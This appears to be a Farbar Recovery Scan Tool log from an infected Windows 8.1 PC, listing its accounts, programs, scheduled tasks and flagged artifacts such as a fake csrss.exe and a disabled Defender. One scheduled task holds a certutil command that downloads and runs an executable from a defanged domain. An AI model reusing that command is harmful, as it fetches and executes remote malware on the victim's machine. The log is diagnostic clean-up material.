2019-02-05 00:50 - 2019-02-05 00:50 - 000126464 _____ () C:\Users\Stanley\AppData\Local\noah.dat
2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Ran-Lex.exe
2019-02-05 00:50 - 2019-02-05 00:50 - 002037348 _____ () C:\Users\Stanley\AppData\Local\Ran-Lex.tst
2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg
2019-02-05 00:49 - 2019-02-05 01:33 - 000722944 _____ () C:\Users\Stanley\AppData\Local\sham.db
2019-02-05 00:50 - 2019-02-05 00:50 - 000032038 _____ () C:\Users\Stanley\AppData\Local\uninstall_temp.ico

Files to move or delete:
====================
C:\Windows\rss\csrss.exe
C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe


Some files in TEMP:
====================
2019-02-04 22:34 - 2019-02-05 01:46 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\syncios.exe
2019-01-30 07:52 - 2019-01-30 07:52 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\syncios.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-31 16:49

==================== End of FRST.txt ============================

 

 

 

 

 

ADDITION.TXT

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01
Ran by #Strazzo.RoseGold## (12-02-2019 07:10:51)
Running from C:\Users\Stanley\Downloads\FRST
Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

#Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley
Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled)
RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version:  - PDFZilla)
7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version:  - Code Crafters Software Limited)
Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
AIMP (HKLM-x32\...\AIMP) (Version: v4.00.1687, 18.01.2016 - AIMP DevTeam)
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry)
BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden
BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden
BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
DriverPack Easy Search (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\DriverPack Easy Search) (Version: 1.0 - DriverPack Solution)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.)
GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.)
iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.)
IncrediMail (HKLM-x32\...\{35505AE1-27E2-4206-B3BF-58771803B8D0}) (Version: 6.6.0.5344 - IncrediMail) Hidden
IncrediMail 2.5 (HKLM-x32\...\IncrediMail) (Version: 6.6.0.5344 - IncrediMail Ltd.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl)
K-Lite Codec Pack 13.8.2 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.8.2 - KLCP)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
OpenVPN 2.4.6-I602  (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.)
Opera Stable 57.0.3098.116 (HKLM-x32\...\Opera 57.0.3098.116) (Version: 57.0.3098.116 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd)
Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.)
SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws)
Skype version 8.38 (HKLM-x32\...\Skype_is1) (Version: 8.38 - Skype Technologies S.A.)
SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated)
Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft)
Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
uTorrent Web (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\utweb) (Version: 0.16.0 - BitTorrent, Inc.)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Web Companion (HKLM-x32\...\{962c09bc-ffdf-415f-8554-7bf56c52618b}) (Version: 4.5.1957.3838 - Lavasoft)
WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp)
WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH)
Windows Driver Package - Google Corporation (androidusb) USB  (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass  (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.)
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (ssudmdm) Modem  (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (WinUSB) AndroidUsbDeviceClass  (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Stanley\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll [2018-05-04] (Artem Izmaylov -> AIMP DevTeam)
ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll [2018-05-04] (Artem Izmaylov -> AIMP DevTeam)
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.)
Task: {0201CCC7-6501-45DB-A996-1FE7FF3DA309} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.)
Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {15570572-319C-48BD-AD3A-A7BCC7852BC7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {28881E47-3230-4F62-9776-67E7151C7EAD} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe () [File not signed]
Task: {3BA5F14D-A722-4A2B-BB6D-E5E747D3F491} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.)
Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated)
Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {567829EB-0803-46FA-8139-6EAAC8AC96FA} - System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.)
Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.)
Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {B8341303-B899-411B-B0C7-90BB369E5C8C} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server
Task: {C3FE92DB-969F-447D-9F05-1E0093D0326E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://delaker.info/app/app.exe C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.)
Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros
Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe/update!STRAZZOWEEZY\#Strazzo.Ros <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Stanley\Desktop\BELIEVE WORKGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\Desktop\Person 1 - Chrome (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\Desktop\Person 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl
ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\225bb61db2f318c1\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"

==================== Loaded Modules (Whitelisted) ==============

2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll
2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
 -  - 000000000 ____H () C:\Windows\windefender.exe
2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll
2018-04-12 18:06 - 2019-02-02 19:04 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2019-02-09 01:00 - 2019-02-02 19:04 - 002392416 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
2019-02-09 01:00 - 2019-02-02 19:04 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node
2019-02-09 01:00 - 2019-02-02 19:04 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node
2019-02-09 01:00 - 2019-02-02 19:04 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node
